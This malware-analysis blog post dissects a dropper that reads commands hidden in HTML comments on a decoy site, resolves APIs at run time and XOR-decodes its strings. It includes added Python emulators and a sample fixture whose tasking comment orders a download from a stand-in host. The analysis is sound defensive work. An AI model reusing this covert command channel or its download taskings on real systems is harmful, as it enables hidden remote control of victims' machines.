
Anatomy of a Targeted Attack

July 25, 2012

Stage zero—malware dropper

We constantly deal with targeted attacks, and sometimes we are lucky enough to find the initial command and control mechanism still live. On one malware response engagement we found a sample that was querying a website acting as a Command and Control (CnC) server. We were able to mirror the entire site and reverse engineer the control mechanism inside the malware. The following deep dive discusses some of our findings.

The CnC server that was sending out instructions was designed to look like a simple website. The HTML on the site rendered as a normal webpage. However, we discovered that the commands were hidden inside the HTML comments of the page. When we visited the landing page on the site, we were greeted with the following under-construction message.

[Figure: the under-construction landing page]

If we view the source of this page we see the following normal-looking HTML:

[Figure: page source of the landing page]

The comment at the top, while fairly inconspicuous, is part of how the attacker controls the malware on the infected machine. The directory we mirrored contained numerous MRTG files, logs, and a Microsoft CAB file. The MRTG reports also look legitimate and harmless, just like the under-construction page, as the following figure shows.

[Figure: a decoy MRTG report from the mirrored site]

If we scan the HTML files for the string “DOCHTML” we find it in several of them:

[Figure: search results for DOCHTML across the mirrored HTML files]

Within the binary we find a function that resolves API addresses from urlmon.dll and wininet.dll at run time. The APIs are then called indirectly through those resolved pointers, so they never appear in the import table. A second function decodes the binary's strings, adding another layer of obfuscation. The network APIs are used to pull an index.html file, which is then parsed for instructions. The primary instructions are sleep, terminate, or download and execute a specified file.

[Figure: the run-time API resolution routine in the disassembly]

The CnC routine parses the first line of the HTML file it downloads and looks for the leading comment delimiter. What sits between the delimiters is the actual command, which is translated to 1, 2, or 3 and returned to decide whether the binary should download and execute, sleep, or die. To verify this, we can package a copy of calc.exe in a CAB file and force the malware to download and execute it on a test system, as seen below.

[Figure: calc.exe launched by the malware after a forced download]
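To make the parsing concrete, here is an added example written for this page; it is neither the post's own script nor the dropper's code. It emulates the dropper's first-line comment parsing and the defender-side marker scan, run over a constructed stand-in for the mirrored site. The post gives only the comment-delimited layout and the 1/2/3 opcode mapping, so the command keywords, the placement of the DOCHTML token inside the comment, and the host name are all assumptions.

```python
import re

# Assumed command vocabulary. The post says the text between the comment
# delimiters is translated to 1, 2 or 3 (download-and-execute, sleep, die)
# but does not reproduce the keywords, so these are placeholders.
OPCODES = {"download": 1, "sleep": 2, "die": 3}

# Assumption: the DOCHTML string the post searched for is the token that
# marks a comment as a tasking comment rather than an ordinary one.
MARKER = "DOCHTML"

COMMENT_RE = re.compile(r"<!--(.*?)-->")


def extract_command(html, marker=MARKER):
    """Mimic the dropper: look only at the first line of the page, pull the
    first HTML comment, and return the text after the marker (or None if the
    line carries no marked comment)."""
    first_line = html.split("\n", 1)[0]
    match = COMMENT_RE.search(first_line)
    if not match:
        return None
    body = match.group(1).strip()
    if not body.startswith(marker):
        return None          # an ordinary comment, not a tasking
    return body[len(marker):].strip()


def classify(command):
    """Translate a raw command into (opcode, argument).

    Opcode 0 means "nothing recognised"; a real dropper would probably treat
    that like sleep, but keeping it distinct lets an analyst tell a decoy
    page from a live tasking."""
    if not command:
        return (0, None)
    verb, _, argument = command.partition(" ")
    return (OPCODES.get(verb.lower(), 0), argument.strip() or None)


def find_marker(files, marker=MARKER):
    """Defender side: list every mirrored file whose contents carry the marker.
    This is the scan the post performs for DOCHTML; `files` maps file name to
    file contents."""
    return sorted(name for name, text in files.items() if marker in text)


def task_from_site(files, name="index.html"):
    """Emulate one beacon: read `name` from the mirror and decode its tasking."""
    return classify(extract_command(files.get(name, "")))


# Constructed stand-in for the mirrored CnC directory (not the real site).
# The host name is invented; the .invalid TLD never resolves.
MIRRORED_SITE = {
    "index.html": (
        "<!-- DOCHTML download http://cnc.example.invalid/update.cab -->\n"
        "<html><body><h1>Under construction</h1></body></html>\n"
    ),
    "mrtg/daily.html": (
        "<!-- DOCHTML sleep -->\n"
        "<html><body><img src='daily.png'></body></html>\n"
    ),
    "mrtg/style.css": "body { font-family: sans-serif; }\n",
}


if __name__ == "__main__":
    print("files carrying the marker:", find_marker(MIRRORED_SITE))
    for page in MIRRORED_SITE:
        print(page, "->", task_from_site(MIRRORED_SITE, page))
```

Two points worth noting when reusing this: the dropper reads only the first line, so a marker buried further down a page is a decoy or a leftover rather than a live tasking, and a page with no marked comment is deliberately reported as opcode 0 rather than silently treated as sleep, so the analyst can see which mirrored files actually carry commands.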

Simple enough for a CnC mechanism, although the CAB file we pulled from the malicious site was a remote access tool rather than calc.exe. While reversing the sample we also wrote a short IDAPython snippet that emulates the string-decoding routine and automatically comments every reference to those strings in the IDB, so you do not have to decode each string by hand. The decode function is simple: the first and last bytes of the array are XORed together to form a key, which is then XORed with each of the remaining bytes, as shown below.

[Figure: the string-decoding routine]
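The decoding scheme in plain Python, as an added example rather than the post's IDAPython script: `decode_string` applies the key derivation described above, `encode_string` is its inverse (added here only to build test vectors), and `annotate` does what the script does once IDA is taken out of the picture, mapping each referencing address to the decoded text. The addresses and the key bytes are invented; the post's reading of "each of the remaining" bytes as the bytes strictly between the first and last is an interpretation stated in the code.

```python
def decode_string(buf):
    """Apply the dropper's string decoding to an encoded byte array.

    key = first byte XOR last byte; every byte between them is XORed with
    that key. The post says "each of the remaining" bytes; this example reads
    that as the bytes strictly between the first and the last."""
    data = bytes(buf)
    if len(data) < 2:
        raise ValueError("encoded array must hold at least the two key bytes")
    key = data[0] ^ data[-1]
    return bytes(b ^ key for b in data[1:-1])


def decode_c_string(buf):
    """Decode and cut at the first NUL, as the binary would when it treats the
    result as a C string."""
    return decode_string(buf).split(b"\x00", 1)[0].decode("latin-1")


def encode_string(plaintext, first, last):
    """Inverse of decode_string, used here only to build test vectors.

    Note the weakness of the scheme: if first == last the key is 0 and the
    string is stored in the clear, so a plain strings(1) pass finds it."""
    key = first ^ last
    return bytes([first]) + bytes(b ^ key for b in plaintext) + bytes([last])


def annotate(encoded_by_address):
    """What the IDAPython script does with IDA removed: map every address that
    references an encoded string to the text that belongs in its comment.
    Inside IDA the loop body would end with idc.set_cmt(ea, text, 0)
    (MakeComm in the IDA releases of the post's era)."""
    return {ea: decode_c_string(blob) for ea, blob in encoded_by_address.items()}


# Constructed vectors: two DLL names the dropper resolves at run time,
# encoded with arbitrary key bytes. These are not bytes from the sample.
SAMPLE_STRINGS = {
    0x401000: encode_string(b"urlmon.dll\x00", 0x5A, 0x3C),
    0x401020: encode_string(b"wininet.dll\x00", 0x10, 0x20),
}


if __name__ == "__main__":
    for ea, text in sorted(annotate(SAMPLE_STRINGS).items()):
        print(f"{ea:#010x}  {text}")
```

Because the key is derived from the array itself, nothing outside the string is needed to decode it; that is what makes it cheap to emulate in a script, and also why a hunt for the DLL and API names in a sample of this family should run the decoder over candidate byte arrays rather than rely on a plain string search.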

The malware is simple yet extremely effective, hiding in plain sight.

Immunity’s Python API for ImmDbg has a “disasmBackward” function that IDC appears to lack. Since that functionality was extremely useful for enumerating the parameters passed to functions, I emulated it in IDAPython. It is effective and useful in some situations, but string operations can be expensive, so keep that in mind should you choose to reuse the function elsewhere. A link to the script file is below.

Security Tools:

DecodeAndComment.py.txt
